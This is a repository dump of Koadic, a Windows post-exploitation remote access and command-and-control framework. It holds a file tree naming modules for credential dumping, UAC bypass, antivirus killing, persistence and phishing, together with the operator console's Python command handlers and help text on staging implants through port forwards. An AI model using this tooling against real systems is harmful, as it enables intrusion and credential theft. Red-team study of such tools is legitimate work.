├── .gitattributes ├── .gitignore ├── .gitmodules ├── DEFCON25.pdf ├── Dockerfile ├── LICENSE ├── README.md ├── core ├── __init__.py ├── cidr.py ├── colors.py ├── commands │ ├── __init__.py │ ├── api.py │ ├── clear.py │ ├── cmdshell.py │ ├── createstager.py │ ├── creds.py │ ├── domain.py │ ├── edit.py │ ├── exit.py │ ├── help.py │ ├── info.py │ ├── jobs.py │ ├── kill.py │ ├── listeners.py │ ├── load.py │ ├── pabst.py │ ├── paddy.py │ ├── portfwd.py │ ├── previous.py │ ├── pyexec.py │ ├── repeatjobs.py │ ├── run.py │ ├── set.py │ ├── sounds.py │ ├── spool.py │ ├── taco.py │ ├── unset.py │ ├── use.py │ ├── valentine.py │ ├── verbose.py │ └── zombies.py ├── cred_parser.py ├── extant.py ├── handler.py ├── implant.py ├── job.py ├── linter.py ├── loader.py ├── mappings.py ├── options.py ├── payload.py ├── plugin.py ├── repeatjobclock.py ├── rest_server.py ├── restoreclock.py ├── server.py ├── session.py ├── shell.py ├── stager.py └── tick.py ├── data ├── banner.txt ├── banner_info.txt ├── bin │ ├── Tash │ │ ├── Release │ │ │ ├── Tash.dll │ │ │ ├── Tash.exp │ │ │ ├── Tash.lib │ │ │ ├── TashClient.exe │ │ │ ├── tash.x.js │ │ │ └── tash.y.js │ │ ├── Tash.sln │ │ ├── Tash.suo │ │ ├── Tash │ │ │ ├── ReadMe.txt │ │ │ ├── Tash.aps │ │ │ ├── Tash.cpp │ │ │ ├── Tash.def │ │ │ ├── Tash.idl │ │ │ ├── Tash.rc │ │ │ ├── Tash.rgs │ │ │ ├── Tash.vcproj │ │ │ ├── TashLoader.cpp │ │ │ ├── TashLoader.h │ │ │ ├── TashLoader.rgs │ │ │ ├── Tash_i.c │ │ │ ├── Tash_i.h │ │ │ ├── Tash_p.c │ │ │ ├── dlldata.c │ │ │ ├── dlldatax.c │ │ │ ├── dlldatax.h │ │ │ ├── dllmain.cpp │ │ │ ├── dllmain.h │ │ │ ├── resource.h │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ └── TashClient │ │ │ ├── ReadMe.txt │ │ │ ├── TashClient.cpp │ │ │ ├── TashClient.vcproj │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ ├── decode_syskey.py │ ├── dynwrapx.dll │ ├── mimishim.dll │ ├── mimishim.x64.dll │ ├── mimishim │ │ ├── .gitignore │ │ ├── README.md │ │ ├── ReflectiveDLLInjection │ │ │ ├── .gitignore │ │ │ ├── LICENSE.txt │ │ │ ├── Readme.md │ │ │ ├── dll │ │ │ │ ├── koadic_load.c │ │ │ │ ├── koadic_load.h │ │ │ │ ├── koadic_net.c │ │ │ │ ├── koadic_net.h │ │ │ │ ├── koadic_process.c │ │ │ │ ├── koadic_process.h │ │ │ │ ├── koadic_types.h │ │ │ │ ├── koadic_util.c │ │ │ │ ├── koadic_util.h │ │ │ │ ├── metasploit │ │ │ │ │ ├── metasploit_inject.c │ │ │ │ │ ├── metasploit_inject.h │ │ │ │ │ ├── metasploit_loader.c │ │ │ │ │ ├── metasploit_loader.h │ │ │ │ │ ├── metasploit_ps.c │ │ │ │ │ └── metasploit_ps.h │ │ │ │ ├── mimishim.filters │ │ │ │ ├── mimishim.sln │ │ │ │ ├── mimishim.vcproj │ │ │ │ ├── mimishim.vcxproj │ │ │ │ └── src │ │ │ │ │ ├── ReflectiveDLLInjection.h │ │ │ │ │ ├── ReflectiveDll.c │ │ │ │ │ ├── ReflectiveLoader.c │ │ │ │ │ └── ReflectiveLoader.h │ │ │ ├── inject │ │ │ │ ├── inject.sln │ │ │ │ ├── inject.vcproj │ │ │ │ ├── inject.vcxproj │ │ │ │ ├── inject.vcxproj.filters │ │ │ │ └── src │ │ │ │ │ ├── GetProcAddressR.c │ │ │ │ │ ├── GetProcAddressR.h │ │ │ │ │ ├── Inject.c │ │ │ │ │ ├── LoadLibraryR.c │ │ │ │ │ ├── LoadLibraryR.h │ │ │ │ │ └── ReflectiveDLLInjection.h │ │ │ └── rdi.sln │ │ ├── emu │ │ │ ├── powerkatz32.py │ │ │ └── powerkatz64.py │ │ └── server.py │ ├── parse_lsass.py │ ├── powerkatz32.dll │ ├── powerkatz64.dll │ ├── secretsdump │ │ └── secretsdump.py │ ├── shellcode_dotnet2js.cs │ └── shellcode_dotnet2js.dll ├── implant │ ├── elevate │ │ ├── bypassuac_compdefaults.js │ │ ├── bypassuac_compmgmtlauncher.js │ │ ├── bypassuac_eventvwr.js │ │ ├── bypassuac_eventvwr.vbs │ │ ├── bypassuac_fodhelper.js │ │ ├── bypassuac_sdclt.js │ │ ├── bypassuac_slui.js │ │ ├── bypassuac_systempropertiesadvanced.js │ │ ├── bypassuac_wsreset.js │ │ └── system_createservice.js │ ├── fun │ │ ├── thunderstruck.js │ │ ├── thunderstruck.vbs │ │ ├── voice.js │ │ └── voice.vbs │ ├── gather │ │ ├── clipboard.js │ │ ├── clipboard.vbs │ │ ├── comsvcs_lsass.js │ │ ├── enum_domain_info.js │ │ ├── enum_printers.js │ │ ├── enum_shares.js │ │ ├── enum_users.js │ │ ├── enum_users.js.old │ │ ├── hashdump_dc.js │ │ ├── hashdump_sam.js │ │ ├── loot_finder.js │ │ └── user_hunter.js │ ├── inject │ │ ├── mimikatz_dotnet2js.js │ │ ├── mimikatz_dynwrapx.js │ │ ├── mimikatz_tashlib.js │ │ ├── reflectdll_excel.js │ │ ├── shellcode.vba │ │ ├── shellcode_dotnet2js.js │ │ ├── shellcode_dynwrapx.js │ │ └── shellcode_excel.js │ ├── manage │ │ ├── enable_rdesktop.js │ │ ├── enable_rdesktop.vbs │ │ ├── exec_cmd.js │ │ ├── exec_cmd.vbs │ │ └── killav.vbs │ ├── persist │ │ ├── add_user.js │ │ ├── registry.dropper │ │ ├── registry.js │ │ ├── schtasks.dropper │ │ ├── schtasks.js │ │ ├── wmi.dropper │ │ └── wmi.js │ ├── phish │ │ ├── password_box.js │ │ └── password_box.vbs │ ├── pivot │ │ ├── exec_psexec.js │ │ ├── exec_wmi.js │ │ └── exec_wmi.vbs │ ├── scan │ │ ├── tcp.js │ │ └── tcp.vbs │ └── util │ │ ├── download_file.js │ │ ├── download_file.vbs │ │ ├── upload_file.js │ │ └── upload_file.vbs ├── pabst.txt ├── shamrock.txt ├── stager │ ├── js │ │ ├── bitsadmin │ │ │ ├── bitsadmin.cmd │ │ │ └── template.wsf │ │ ├── disk │ │ │ └── disk.cmd │ │ ├── mshta │ │ │ ├── mshta.cmd │ │ │ └── template.hta │ │ ├── mshtajs │ │ │ └── mshtajs.cmd │ │ ├── regsvr │ │ │ ├── regsvr.cmd │ │ │ └── template.sct │ │ ├── rundll32 │ │ │ └── rundll32.cmd │ │ ├── rundll32_js │ │ │ └── rundll32_js.cmd │ │ ├── stage.js │ │ ├── stdlib.js │ │ └── wmic │ │ │ ├── template.xsl │ │ │ └── wmic.cmd │ └── vbscript │ │ ├── disk.cmd │ │ ├── mshta.cmd │ │ ├── stdlib.vbs │ │ └── work.vbs ├── taco.txt └── valentine.txt ├── koadic ├── modules ├── implant │ ├── elevate │ │ ├── bypassuac_compdefaults.py │ │ ├── bypassuac_compmgmtlauncher.py │ │ ├── bypassuac_eventvwr.py │ │ ├── bypassuac_fodhelper.py │ │ ├── bypassuac_sdclt.py │ │ ├── bypassuac_slui.py │ │ ├── bypassuac_systempropertiesadvanced.py │ │ ├── bypassuac_wsreset.py │ │ └── system_createservice.py │ ├── fun │ │ ├── thunderstruck.py │ │ └── voice.py │ ├── gather │ │ ├── clipboard.py │ │ ├── comsvcs_lsass.py │ │ ├── enum_domain_info.py │ │ ├── enum_printers.py │ │ ├── enum_shares.py │ │ ├── enum_users.py │ │ ├── hashdump_dc.py │ │ ├── hashdump_sam.py │ │ ├── loot_finder.py │ │ ├── office_key.py │ │ ├── user_hunter.py │ │ └── windows_key.py │ ├── inject │ │ ├── mimikatz_dotnet2js.py │ │ ├── mimikatz_dynwrapx.py │ │ ├── mimikatz_tashlib.py │ │ ├── reflectdll_excel.py │ │ ├── shellcode_dotnet2js.py │ │ ├── shellcode_dynwrapx.py │ │ └── shellcode_excel.py │ ├── manage │ │ ├── enable_rdesktop.py │ │ ├── exec_cmd.py │ │ └── killav.py │ ├── persist │ │ ├── add_user.py │ │ ├── registry.py │ │ ├── schtasks.py │ │ └── wmi.py │ ├── phish │ │ └── password_box.py │ ├── pivot │ │ ├── exec_psexec.py │ │ ├── exec_wmi.py │ │ ├── exec_wmic.py │ │ └── stage_wmi.py │ ├── scan │ │ └── tcp.py │ └── util │ │ ├── download_file.py │ │ ├── multi_module.py │ │ └── upload_file.py └── stager │ ├── js │ ├── bitsadmin.py │ ├── disk.py │ ├── mshta.py │ ├── regsvr.py │ ├── rundll32_js.py │ └── wmic.py │ ├── jscript.py │ ├── powershell.py │ └── vbscript.py └── requirements.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | restore.json 3 | restores/ 4 | core/sounds.py 5 | data/bin/sounds/* 6 | autorun.example 7 | # Byte-compiled / optimized / DLL files 8 | __pycache__/ 9 | *.py[cod] 10 | *$py.class 11 | 12 | # C extensions 13 | *.so 14 | 15 | # Distribution / packaging 16 | .Python 17 | env/ 18 | build/ 19 | develop-eggs/ 20 | dist/ 21 | downloads/ 22 | eggs/ 23 | .eggs/ 24 | lib/ 25 | lib64/ 26 | parts/ 27 | sdist/ 28 | var/ 29 | wheels/ 30 | *.egg-info/ 31 | .installed.cfg 32 | *.egg 33 | 34 | # PyInstaller 35 | # Usually these files are written by a python script from a template 36 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 37 | *.manifest 38 | *.spec 39 | 40 | # Installer logs 41 | pip-log.txt 42 | pip-delete-this-directory.txt 43 | 44 | # Unit test / coverage reports 45 | htmlcov/ 46 | .tox/ 47 | .coverage 48 | .coverage.* 49 | .cache 50 | nosetests.xml 51 | coverage.xml 52 | *.cover 53 | .hypothesis/ 54 | 55 | # Translations 56 | *.mo 57 | *.pot 58 | 59 | # Django stuff: 60 | *.log 61 | local_settings.py 62 | 63 | # Flask stuff: 64 | instance/ 65 | .webassets-cache 66 | 67 | # Scrapy stuff: 68 | .scrapy 69 | 70 | # Sphinx documentation 71 | docs/_build/ 72 | 73 | # PyBuilder 74 | target/ 75 | 76 | # Jupyter Notebook 77 | .ipynb_checkpoints 78 | 79 | # pyenv 80 | .python-version 81 | 82 | # celery beat schedule file 83 | celerybeat-schedule 84 | 85 | # SageMath parsed files 86 | *.sage.py 87 | 88 | # dotenv 89 | .env 90 | 91 | # virtualenv 92 | .venv 93 | venv/ 94 | ENV/ 95 | 96 | # Spyder project settings 97 | .spyderproject 98 | .spyproject 99 | 100 | # Rope project settings 101 | .ropeproject 102 | 103 | # mkdocs documentation 104 | /site 105 | 106 | # mypy 107 | .mypy_cache/ 108 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "impacket"] 2 | path = data/impacket 3 | url = https://github.com/CoreSecurity/impacket.git 4 | -------------------------------------------------------------------------------- /DEFCON25.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/DEFCON25.pdf -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.10 2 | WORKDIR /opt/koadic 3 | RUN apt-get update && apt-get install -y python3 python3-pip socat 4 | COPY . /opt/koadic 5 | RUN pip3 install -r requirements.txt 6 | ENTRYPOINT ["./koadic"] 7 | -------------------------------------------------------------------------------- /core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/core/__init__.py -------------------------------------------------------------------------------- /core/colors.py: -------------------------------------------------------------------------------- 1 | class Colors(object): 2 | def __init__(self): 3 | # http://ozzmaker.com/add-colour-to-text-in-python/ 4 | self.ENDC = '\033[0m' 5 | 6 | self.RED = '31' 7 | self.GREEN = '32' 8 | self.YELLOW = '33' 9 | self.BLUE = '34' 10 | self.CYAN = '36' 11 | 12 | self.NORMAL = '0' 13 | self.BOLD = '1' 14 | self.UNDERLINE = '2' 15 | 16 | def error(self, text): 17 | return self.colorize(text, [self.RED, self.BOLD]) 18 | 19 | def warning(self, text): 20 | return self.colorize(text, [self.YELLOW, self.BOLD]) 21 | 22 | def good(self, text): 23 | return self.colorize(text, [self.GREEN, self.BOLD]) 24 | 25 | def status(self, text): 26 | return self.colorize(text, [self.BLUE, self.BOLD]) 27 | 28 | def colorize(self, text, options, readline=False): 29 | start = "" 30 | if readline: 31 | start += "\001" 32 | start += '\033[' 33 | start += ";".join(options) 34 | start += "m" 35 | if readline: 36 | start += "\002" 37 | end = "\001" + self.ENDC + "\002" 38 | else: 39 | end = self.ENDC 40 | 41 | return start + text + end 42 | 43 | def get_prompt(self, state, isreadline = True): 44 | import os 45 | glyph = "#" if os.geteuid() == 0 else "$" 46 | last = state.split("/")[-1] 47 | state = [s[0:3] for s in state.split("/")[:-1]] 48 | state.append(last) 49 | state = "/".join(state) 50 | return "%s%s: %s%s" % (self.colorize("(", [self.GREEN], isreadline), 51 | self.colorize("koadic", [self.BOLD], isreadline), 52 | self.colorize(state, [self.CYAN], isreadline), 53 | self.colorize(")" + glyph + " ", [self.GREEN], isreadline)) 54 | -------------------------------------------------------------------------------- /core/commands/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/core/commands/__init__.py -------------------------------------------------------------------------------- /core/commands/clear.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "clear the screen" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | print("\x1b[2J\x1b[H") 11 | -------------------------------------------------------------------------------- /core/commands/edit.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "shell out to an editor for the current module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | shell.print_plain("") 8 | shell.print_plain("Use %s to edit the current module's python file" % (shell.colors.colorize("edit / edit py / edit python", shell.colors.BOLD))) 9 | shell.print_plain("Use %s to edit the current module's associated javascript file (if applicable)" % (shell.colors.colorize("edit js / edit javascript", shell.colors.BOLD))) 10 | shell.print_plain("Use %s to edit the current module's associated vbscript file (if applicable)" % (shell.colors.colorize("edit vbs / edit vbscript", shell.colors.BOLD))) 11 | shell.print_plain("") 12 | shell.print_plain("NOTE: Uses $EDITOR env variable, otherwise will fallback to vi.") 13 | shell.print_plain("") 14 | 15 | def execute(shell, cmd): 16 | import subprocess, os 17 | 18 | try: 19 | if not os.environ['EDITOR']: 20 | shell.print_error("$EDITOR env variable not set, falling back to vi!") 21 | editor = 'vi' 22 | else: 23 | editor = os.environ['EDITOR'] 24 | except KeyError: 25 | shell.print_error("$EDITOR env variable does not exist, falling back to vi!") 26 | editor = 'vi' 27 | 28 | py_file = "modules/"+shell.state+".py" 29 | js_file = "data/"+shell.state+".js" 30 | vbs_file = "data/"+shell.state+".vbs" 31 | dropper_file = "data/"+shell.state+".dropper" 32 | 33 | splitted = cmd.split() 34 | 35 | if len(splitted) > 1: 36 | ftype = splitted[1].lower() 37 | if ftype == "py" or ftype == "python": 38 | file = py_file 39 | elif ftype == "js" or ftype == "javascript": 40 | file = js_file 41 | elif ftype == "vbs" or ftype == "vbscript": 42 | file = vbs_file 43 | elif ftype == "dropper": 44 | file = dropper_file 45 | else: 46 | return 47 | 48 | if os.path.isfile(file): 49 | editcmd = [editor, file] 50 | else: 51 | return 52 | else: 53 | editcmd = [editor, py_file] 54 | 55 | subprocess.call(editcmd) 56 | shell.run_command('load') 57 | -------------------------------------------------------------------------------- /core/commands/exit.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "exits the program" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def convert_to_parsable(obj): 10 | if isinstance(obj, dict): 11 | new_obj = {} 12 | for key in obj: 13 | if isinstance(key, tuple): 14 | new_obj['/'.join(key)] = obj[key] 15 | elif isinstance(key, str): 16 | new_obj[key] = obj[key] 17 | 18 | elif isinstance(obj, list): 19 | new_obj = [] 20 | for val in obj: 21 | if isinstance(val, tuple): 22 | new_obj.append('/'.join(val)) 23 | elif isinstance(val, str): 24 | new_obj.append(val) 25 | else: 26 | new_obj = [] 27 | 28 | return new_obj 29 | 30 | 31 | def execute(shell, cmd): 32 | restore_map = {} 33 | restore_map['creds'] = convert_to_parsable(shell.creds) 34 | restore_map['creds_keys'] = convert_to_parsable(shell.creds_keys) 35 | restore_map['domain_info'] = convert_to_parsable(shell.domain_info) 36 | restore_map['jobs'] = [] 37 | for jkey, j in shell.jobs.items(): 38 | new_j = {} 39 | new_j['results'] = j.results 40 | new_j['id'] = j.id 41 | new_j['session_id'] = -1 42 | new_j['completed'] = j.completed 43 | new_j['ip'] = j.ip 44 | new_j['name'] = j.name 45 | new_j['key'] = j.key 46 | restore_map['jobs'].append(new_j) 47 | 48 | restore_map['sessions'] = [] 49 | for s in [vars(session) for skey, session in shell.sessions.items()]: 50 | new_s = dict(s) 51 | try: 52 | new_s.pop('stager') 53 | new_s.pop('shell') 54 | except: 55 | pass 56 | new_s['status'] = 0 57 | restore_map['sessions'].append(new_s) 58 | 59 | blank_state = True 60 | 61 | for k in restore_map: 62 | if restore_map[k]: 63 | blank_state = False 64 | 65 | if not blank_state: 66 | restore = open('restore.json', 'w') 67 | import json 68 | restore.write(json.dumps(restore_map)+"\n") 69 | restore.close() 70 | 71 | import sys 72 | sys.exit(0) 73 | -------------------------------------------------------------------------------- /core/commands/help.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "displays help info for a command" 2 | 3 | 4 | def autocomplete(shell, line, text, state): 5 | 6 | # should never go this big... 7 | if len(line.split()) > 2: 8 | return None 9 | 10 | options = [x + " " for x in shell.actions if x.startswith(text)] 11 | 12 | try: 13 | return options[state] 14 | except: 15 | return None 16 | 17 | 18 | def help(shell): 19 | shell.print_plain("") 20 | shell.print_plain("You definitely need help") 21 | shell.print_plain("") 22 | 23 | def execute(shell, cmd): 24 | 25 | splitted = cmd.split() 26 | 27 | if len(splitted) == 1: 28 | return help_all(shell) 29 | 30 | if len(splitted) > 1: 31 | return help_command(shell, splitted[1]) 32 | 33 | 34 | def help_command(shell, command): 35 | if command not in shell.actions: 36 | shell.print_error("No command named %s" % command) 37 | return 38 | 39 | shell.actions[command].help(shell) 40 | 41 | 42 | def help_all(shell): 43 | formats = '\t{0:<14}{1:<16}' 44 | 45 | shell.print_plain("") 46 | shell.print_plain(formats.format("COMMAND", "DESCRIPTION")) 47 | shell.print_plain(formats.format("---------", "-------------")) 48 | 49 | for key, env in sorted(shell.actions.items()): 50 | if getattr(env, "hidden_command", False): 51 | continue 52 | shell.print_plain(formats.format(key, env.DESCRIPTION)) 53 | 54 | shell.print_plain("") 55 | shell.print_plain('Use "help %s" to find more info about a command.' % 56 | shell.colors.colorize("command", [shell.colors.BOLD])) 57 | shell.print_plain("") 58 | -------------------------------------------------------------------------------- /core/commands/info.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "shows the current module options" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | shell.print_plain("") 8 | shell.print_plain("Use %s for advanced options" % (shell.colors.colorize("info -a", shell.colors.BOLD))) 9 | shell.print_plain("") 10 | 11 | def execute(shell, cmd): 12 | env = shell.plugins[shell.state] 13 | 14 | # dynamically set format length 15 | maxlen = 0 16 | for option in env.options.options: 17 | if option.advanced and " -a" not in cmd: 18 | continue 19 | 20 | if option.hidden: 21 | continue 22 | 23 | if len(option.name) > maxlen: maxlen = len(option.name) 24 | 25 | formats = '\t{{0:<{0}}}{{1:<20}}{{2:<8}}{{3:<16}}'.format(maxlen+3) 26 | 27 | shell.print_plain("") 28 | shell.print_plain(formats.format("NAME", "VALUE", "REQ", "DESCRIPTION")) 29 | shell.print_plain(formats.format("-----","------------", "----", "-------------")) 30 | 31 | for option in env.options.options: 32 | if option.advanced and " -a" not in cmd: 33 | continue 34 | 35 | if option.hidden: 36 | continue 37 | 38 | prettybool = "yes" if option.required else "no" 39 | value = str(option.value)[0:16] + "..." if len(str(option.value)) > 16 else str(option.value) 40 | shell.print_plain(formats.format(option.name, value, prettybool, option.description)) 41 | 42 | shell.print_plain("") 43 | -------------------------------------------------------------------------------- /core/commands/jobs.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "shows info about jobs" 2 | 3 | def autocomplete(shell, line, text, state): 4 | pass 5 | 6 | def help(shell): 7 | shell.print_plain("") 8 | shell.print_plain("Use %s to view job results (if any)" % (shell.colors.colorize("jobs JOB_ID", shell.colors.BOLD))) 9 | shell.print_plain("Use %s to hide/unhide a job (or multiple jobs)" % (shell.colors.colorize("jobs -h JOB_ID[,JOB_ID,JOB_ID-JOB_ID]", shell.colors.BOLD))) 10 | shell.print_plain("Use %s to view hidden jobs" % (shell.colors.colorize("jobs -h", shell.colors.BOLD))) 11 | shell.print_plain("") 12 | 13 | def print_job(shell, id): 14 | for jkey, job in shell.jobs.items(): 15 | if job.id == int(id) and job.status_string() in ["Complete", "Failed"]: 16 | job.display() 17 | 18 | def hide_jobs(shell, ids): 19 | all_ids = [] 20 | for id in ids.split(','): 21 | if '-' in id: 22 | [all_ids.append(i) for i in range(int(id.split('-')[0]), int(id.split('-')[-1])+1)] 23 | else: 24 | all_ids.append(int(id)) 25 | for jkey, job in shell.jobs.items(): 26 | if job.id in all_ids: 27 | job.hidden = not job.hidden 28 | 29 | def print_all_jobs(shell, hidden=False): 30 | formats = "\t{0:<5}{1:<10}{2:<20}{3:<40}" 31 | 32 | shell.print_plain("") 33 | 34 | shell.print_plain(formats.format("ID", "STATUS", "ZOMBIE", "NAME")) 35 | shell.print_plain(formats.format("-"*4, "-"*9, "-"*10, "-"*20)) 36 | for jkey, job in shell.jobs.items(): 37 | if hidden != job.hidden: 38 | continue 39 | 40 | if job.session_id != -1: 41 | zombie = "%s (%d)" % (job.ip, job.session_id) 42 | else: 43 | zombie = "%s (%d)" % (job.ip, -1) 44 | 45 | shell.print_plain(formats.format(job.id, job.status_string(), zombie, job.name)) 46 | 47 | 48 | shell.print_plain("") 49 | 50 | 51 | 52 | def execute(shell, cmd): 53 | 54 | splitted = cmd.split() 55 | 56 | if len(splitted) > 2: 57 | if splitted[1] == '-h': 58 | hide_jobs(shell, splitted[2]) 59 | return 60 | else: 61 | shell.print_error("Unknown option '"+splitted[1]+"'") 62 | elif len(splitted) > 1 and splitted[1] == '-h': 63 | print_all_jobs(shell, True) 64 | return 65 | elif len(splitted) > 1: 66 | id = splitted[1] 67 | try: 68 | print_job(shell, id) 69 | except ValueError: 70 | shell.print_error("Unknown option '"+splitted[1]+"'") 71 | return 72 | 73 | print_all_jobs(shell) 74 | -------------------------------------------------------------------------------- /core/commands/kill.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "kill a zombie by ID" 2 | 3 | def autocomplete(shell, line, text, state): 4 | pass 5 | 6 | def help(shell): 7 | shell.print_plain("") 8 | shell.print_plain("Usage: kill #") 9 | shell.print_plain(" kill all") 10 | shell.print_plain(" kill dead") 11 | shell.print_plain("") 12 | 13 | def kill_zombie(shell, id): 14 | formats = "\t{0:<5}{1:<10}{2:<20}{3:<40}" 15 | 16 | if not id.isdigit() and id.lower() not in ["all", "dead"]: 17 | shell.print_error("Not a valid argument to kill: %s" % id) 18 | return 19 | 20 | if id.lower() == "all": 21 | [session.kill() for skey, session in shell.sessions.items() if session.killed == False] 22 | 23 | elif id.lower() == "dead": 24 | [session.kill() for skey, session in shell.sessions.items() if session.status == 0 and session.killed == False] 25 | 26 | else: 27 | [session.kill() for skey, session in shell.sessions.items() if session.id == int(id) and session.killed == False] 28 | 29 | if id.lower() == "all": 30 | shell.print_good("All Zombies Killed!") 31 | elif id.lower() == "dead": 32 | shell.print_good("Dead Zombies Killed!") 33 | 34 | shell.play_sound('KILL') 35 | 36 | def execute(shell, cmd): 37 | 38 | splitted = cmd.split() 39 | 40 | if len(splitted) > 1: 41 | id = splitted[1] 42 | kill_zombie(shell, id) 43 | return 44 | 45 | help(shell) 46 | -------------------------------------------------------------------------------- /core/commands/load.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import importlib 3 | import core.plugin 4 | import copy 5 | 6 | DESCRIPTION = "reloads all modules" 7 | 8 | def autocomplete(shell, line, text, state): 9 | return None 10 | 11 | def help(shell): 12 | pass 13 | 14 | def execute(shell, cmd): 15 | count = 0 16 | for key in shell.plugins: 17 | _key = key 18 | 19 | try: 20 | key = key.split("/")[-1] 21 | module = sys.modules[key] 22 | source = open("modules/"+_key+".py").read() 23 | exec(source,module.__dict__) 24 | 25 | for thing in dir(module): 26 | try: 27 | thing = getattr(module, thing) 28 | 29 | if issubclass(thing, core.plugin.Plugin): 30 | new_thing = thing(shell) 31 | new_thing.options = copy.deepcopy(shell.plugins[_key].options) 32 | shell.plugins[_key] = new_thing 33 | count += 1 34 | except TypeError as e: 35 | pass 36 | except: 37 | shell.print_error("Failed to load %s" % _key) 38 | pass 39 | 40 | shell.play_sound('LOAD') 41 | shell.print_good("Successfully loaded %d modules." % count) 42 | -------------------------------------------------------------------------------- /core/commands/pabst.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "PBR Friday" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 11 | print(open("data/pabst.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/paddy.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "It's paddy, not patty" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 11 | print(open("data/shamrock.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/portfwd.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "stub command for help text" 2 | hidden_command = True 3 | 4 | def autocomplete(shell, line, text, state): 5 | return None 6 | 7 | def help(shell): 8 | msg = """ 9 | Unlike most connectback RATs, Koadic does not rely on a single long-lived TCP connection. Windows Script Host isn't smart enough to do that. Instead, Koadic uses repeated HTTP requests in separate connections. It is important that you not modify the URL of a listener between when Koadic spits it out and when it is executed on the host because the very first thing Koadic is going to try and do after the first connection is establish a second connection - and it's going to try and make the second connection using the URL Koadic knows about, not the one you executed. 10 | 11 | So! How do I use Koadic through a port forward? Easy! Just make Koadic generate the correct URL right out of the gate. Set SRVHOST and SRVPORT to whatever address the target box needs to initiate connections to. It doesn't matter if that's not a local address on the host where Koadic is running. Koadic will just bind 0.0.0.0 and accept connections from anywhere. 12 | 13 | ----- 14 | 15 | Stagers now have an AUTOFWD option that defaults to true. This is supposed to solve the problem posed above by checking out the Host header and using this to override SRVHOST and SRVPORT. If for some reason Host headers are not included in requests, then this will not work and you will need to follow the advice above. Setting AUTOFWD false will force stagers to not respect a differing Host header and Zombies will not attempt to stage. 16 | """.strip() 17 | try: 18 | import textwrap 19 | msg2 = "" 20 | for paragraph in msg.split("\n\n"): 21 | msg2 += "\n".join(textwrap.wrap(paragraph)) 22 | msg2 += "\n\n" 23 | msg = msg2.strip() 24 | except: 25 | pass 26 | shell.print_plain(msg) 27 | 28 | def execute(shell, cmd): 29 | shell.print_plain("Sorry! This is just a stub-command to explain how to stage Koadic through a port forward. Windows Script Host is not smart enough for Koadic to do its own port forwards. You probably just want to stage a native RAT."); 30 | -------------------------------------------------------------------------------- /core/commands/previous.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "go back to the last used module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | pass 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | tmp = shell.state 11 | try: 12 | shell.state = shell.previous 13 | except: 14 | pass 15 | shell.previous = tmp 16 | 17 | -------------------------------------------------------------------------------- /core/commands/pyexec.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "evals some python" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | code = " ".join(cmd.split(" ")[1:]) 11 | exec(code) 12 | -------------------------------------------------------------------------------- /core/commands/run.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "runs the current module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | try: 11 | env = shell.plugins[shell.state] 12 | env.run() 13 | except KeyboardInterrupt: 14 | return 15 | -------------------------------------------------------------------------------- /core/commands/set.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | DESCRIPTION = "sets a variable for the current module" 4 | 5 | def autocomplete(shell, line, text, state): 6 | 7 | env = shell.plugins[shell.state] 8 | if len(line.split()) > 1: 9 | optionname = line.split()[1] 10 | if optionname in [x.name for x in env.options.options if not x.hidden]: 11 | option = [x for x in env.options.options if x.name == optionname][0] 12 | options = [] 13 | if option.boolean: 14 | options = [x for x in ['true', 'false'] if x.upper().startswith(text.upper())] 15 | if option.file: 16 | options = filepaths(text) 17 | if option.implant: 18 | pass 19 | if option.enum: 20 | options = [x for x in option.enum if 